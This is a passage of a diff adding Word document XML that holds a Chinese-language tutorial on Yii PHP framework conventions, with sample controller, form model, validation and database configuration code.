+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>继承</w:t>
+            </w:r>
+            <w:r>
+              <w:t>Controller</w:t>
+            </w:r>
+            <w:r>
+              <w:t>，类名为</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>控制器名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>Controller</w:t>
+            </w:r>
+            <w:r>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>操作名</w:t>
+            </w:r>
+            <w:r>
+              <w:t>为</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>action</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>操作名</w:t>
+            </w:r>
+            <w:r>
+              <w:t>，如下：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>namespace app\controllers;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">class </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>HelloController</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> extends Controller{</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>接收用户输入，输出为内容，默认输出</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>hello world</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">public function </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>actionHello</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">($msg="hello world"){//action </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>前缀后面的名称被映射为操作的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ID</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>渲染输出到</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>view</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>，附带传递变量</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>会自动应用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>views/layouts</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>下的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>mian</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>布局</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>return $this-&gt;render("hello",['message'=&gt;$msg]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>视图</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>命名规则</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>视图</w:t>
+            </w:r>
+            <w:r>
+              <w:t>为</w:t>
+            </w:r>
+            <w:r>
+              <w:t>php</w:t>
+            </w:r>
+            <w:r>
+              <w:t>文件，名称要与</w:t>
+            </w:r>
+            <w:r>
+              <w:t>render</w:t>
+            </w:r>
+            <w:r>
+              <w:t>中指定的一致，存放路径为</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>views/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>控制器名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>视图名</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>.php</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>模型</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>命名规则</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>继承</w:t>
+            </w:r>
+            <w:r>
+              <w:t>model</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>普通模型）或</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>active</w:t>
+            </w:r>
+            <w:r>
+              <w:t>Record</w:t>
+            </w:r>
+            <w:r>
+              <w:t>（数据包关联）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:t>成员名可与</w:t>
+            </w:r>
+            <w:r>
+              <w:t>form</w:t>
+            </w:r>
+            <w:r>
+              <w:t>表单名称一致，数据会自动填充：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>继承</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>model</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>，普通数据模型</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>class EntryForm extends Model{</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>数据成员，与</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>form</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>表单同名</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>public $name;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>public $email;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>设置数据验证规则，验证要调用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>validate</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>方法</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">public function </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>rules</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>(){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>return [</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>[['name','email'],'required'],</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>['email','email']</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>];}</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>Model</w:t>
+            </w:r>
+            <w:r>
+              <w:t>中数据被自动填充，控制器中就不需要再获取</w:t>
+            </w:r>
+            <w:r>
+              <w:t>post</w:t>
+            </w:r>
+            <w:r>
+              <w:t>参数</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>了</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>public function actionEntry(){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>$model=new EntryForm();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t xml:space="preserve">if ($model-&gt;load(\Yii::$app-&gt;request-&gt;post()) </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>&amp;&amp; $model-&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>validate</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>()){</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  //</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>直接验证，不再填充数据</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>return $this-&gt;render("entry-confirm",['model'=&gt;$model]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>}else{</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>return $this-&gt;render("entry",['model'=&gt;$model]);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>}</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6439" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>ActiveRecord</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>模型</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>与数据库</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>关联</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:t>C</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>onfig/</w:t>
+            </w:r>
+            <w:r>
+              <w:t>db.php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>中</w:t>
+            </w:r>
+            <w:r>
+              <w:t>设置数据库信息：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>return [</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'class' =&gt; 'yii\db\Connection',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'dsn' =&gt; 'mysql:host=localhost;dbname=test',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'username' =&gt; 'barret',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'password' =&gt; '1230',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'charset' =&gt; 'utf8',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:leftChars="200" w:left="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>2</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>模型继承</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ActiveRecord</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>，</w:t>
+            </w:r>
+            <w:r>
+              <w:t>类名与数据包名一致</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>//</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>框架会根据类型自动匹配数据表名</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>class Country extends ActiveRecord{</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:t>3</w:t>
+            </w:r>
+            <w:r>
+              <w:t>）控制器中直接调用模型的静态方法</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
